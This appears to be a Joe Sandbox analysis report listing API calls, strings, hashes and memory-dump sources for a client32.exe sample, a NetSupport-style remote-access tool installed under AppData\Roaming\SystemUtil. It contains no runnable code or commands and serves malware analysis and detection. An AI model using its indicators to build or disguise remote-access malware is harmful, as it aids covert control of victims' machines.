• Opcode ID: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
• Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
• Opcode Fuzzy Hash: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
• Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84

APIs
  • Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
  • Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
• CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
• FreeLibrary.KERNEL32(?), ref: 68598EBF
  • Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
• String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
• API String ID: 3215810784-3459472706
• Opcode ID: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
• Instruction ID: 2e7df5cad1e1d205e57a65cd7d462213f867fb545e006c7e25943846b542b7cb
• Opcode Fuzzy Hash: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
• Instruction Fuzzy Hash: 6111C879A801559FEF10DA55DC51BFEB364EB45305FC00455EE2DE3240EB319E44CB66
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11143416
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastLoadMessageProcessString
• String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
• API String ID: 1985783259-2296142801
APIs
• wsprintfA.USER32 ref: 11031376
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastMessageProcess
• String ID: %s%s.bin$305090$clientinv.cpp$m_pDoInv == NULL
• API String ID: 4180936305-1644303538
APIs
• GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
• __strdup.LIBCMT ref: 11140D17
  • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
  • Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E
• _free.LIBCMT ref: 11140D4C
  • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
  • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
• CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
• String ID:
• API String ID: 398584587-0
APIs
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2
  • Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006
• _free.LIBCMT ref: 1100ECB4
  • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
  • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
• _free.LIBCMT ref: 1100ECC7
• _free.LIBCMT ref: 1100ECDA
• _free.LIBCMT ref: 1100ECED
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
• String ID:
• API String ID: 3515823920-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FAE
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FC4
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
• String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
• API String ID: 3779116287-2600120591
• Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
• Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
• Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
• Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
• CloseHandle.KERNEL32(00000000), ref: 1113F95F
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateFile$CloseHandle
• String ID: "
• API String ID: 1443461169-123907689
• Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
• Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
• Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
• Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752
APIs
  • Part of subcall function 685A9BF0: _strncpy.LIBCMT ref: 685A9C14
• inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68596691
• gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966A2
• WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 685966CD
Strings
• Cannot resolve hostname %s, error %d, xrefs: 685966D6
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast_strncpygethostbynameinet_addr
• String ID: Cannot resolve hostname %s, error %d
• API String ID: 2603238076-1802540647
• Opcode ID: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
• Instruction ID: 8ee86666c36afe0e9ec017191a216632d1fe139ab56e6a3bb53b3a1890622fb9
• Opcode Fuzzy Hash: ac746b96797c9f2c88474287111a265455a07addd814ddf11fcf3f1dffda775e
• Instruction Fuzzy Hash: DB219435A402189BDB10DA64DC50BAAB3F8BF98254F808599E919D7280EF31AD44CBA1
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A
  • Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,75C0A1D0,75BF3760,75BF7A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
  • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
  • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
  • Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34
• TranslateMessage.USER32(?), ref: 11026E60
• DispatchMessageA.USER32(?), ref: 11026E66
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
• String ID: Exit Msgloop, quit=%d
• API String ID: 3212272093-2210386016
• Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
• Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
• Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
• Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2
APIs
• wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
• _memset.LIBCMT ref: 1110C477
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastMessageProcess_memset
• String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
• API String ID: 1322847840-2664294811
• Opcode ID: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
• Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
• Opcode Fuzzy Hash: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
• Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5
APIs
• GetTickCount.KERNEL32 ref: 1101761D
  • Part of subcall function 11017520: WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 1101755C
  • Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
  • Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
  • Part of subcall function 11017440: WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 11017472
  • Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
  • Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
• SetEvent.KERNEL32(000002F0), ref: 1101763D
• GetTickCount.KERNEL32 ref: 11017643
Strings
• touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountInitializeObjectSingleTickUninitializeWait$Event
• String ID: touchkbd, systype=%d, chassis=%d, took %d ms
• API String ID: 3357037191-4122679463
• Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
• Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
• Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
• Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2
APIs
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
• K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
• SetLastError.KERNEL32(00000078,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FED
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: AddressEnumErrorLastModulesProcProcess
• String ID: EnumProcessModules
• API String ID: 3858832252-3735562946
• Opcode ID: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
• Instruction ID: c6008895448c7ea24cf5e3f5aa5c2c106650779afcf18f2532c2e3569412b958
• Opcode Fuzzy Hash: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
• Instruction Fuzzy Hash: 41F08C72650218AFCB20DFA8D844E9B77A8EB48721F40C81AFD6AD7740C670EC10CFA0
APIs
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
• K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
• SetLastError.KERNEL32(00000078,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6859503D
Strings
Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorFileLastModuleNameProc
• String ID: GetModuleFileNameExA
• API String ID: 4084229558-758377266
• Opcode ID: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
• Instruction ID: e23656c5dac0cf9fa05560afcc68164bbb297e952d00726f289e8e4ae625ec2a
• Opcode Fuzzy Hash: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
• Instruction Fuzzy Hash: 77F08272600218AFC720DF94E804E9B77A8EB48711F40451BFD45D7240C671F810CBF5
APIs
  • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
• CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
• CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseCreateHandleThread__wcstoi64
• String ID: *AutoICFConfig$Client
• API String ID: 3257255551-59951473
• Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
• Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
• Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
• Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D
APIs
• Sleep.KERNEL32(000000FA), ref: 1106FDC7
• EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
• LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeaveSleep
• String ID: Push
• API String ID: 1566154052-4278761818
• Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
• Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
• Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
• Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92
APIs
• EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
• InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
• Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
• LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
• String ID:
• API String ID: 4212191310-0
• Opcode ID: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
• Instruction ID: 535f9a0d7001d5bb9c61b1ab5c8456b419707014113600a3913e4554816d070a
• Opcode Fuzzy Hash: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
• Instruction Fuzzy Hash: BC21AAB6E00650EFDF129F18C8456DEB7FAEF86315F824417DC65A3240D771A9408B66
APIs
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11141496
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                    • API String ID: 2034136378-336475711
                                                                                                                                                                                                    • Opcode ID: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction ID: d12c9fbe21fce9ebe84299b8ab088ed5ba47cc188f1fd16cec63c381e0116ac0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90213774E043599BDB11CF68CC44BDAF7785B11708F1482D8D69497142DB707688CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ioctlsocket.WSOCK32(97A234B3,4004667F,00000000,a3Zh), ref: 68595D1F
                                                                                                                                                                                                    • select.WSOCK32(00000001,?,00000000,?,00000000,97A234B3,4004667F,00000000,a3Zh), ref: 68595D62
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ioctlsocketselect
                                                                                                                                                                                                    • String ID: a3Zh
                                                                                                                                                                                                    • API String ID: 1457273030-2278443015
                                                                                                                                                                                                    • Opcode ID: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
                                                                                                                                                                                                    • Instruction ID: f4d72408498c597f28c5e98b0793ceec49d4e0105455f2fa7991f5df7ed328ba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54210E71A003189BEB28DF14C9657EDB7B9EF88305F4081EAA80A97281DB745F94DF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, xrefs: 111402A4, 111402B2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
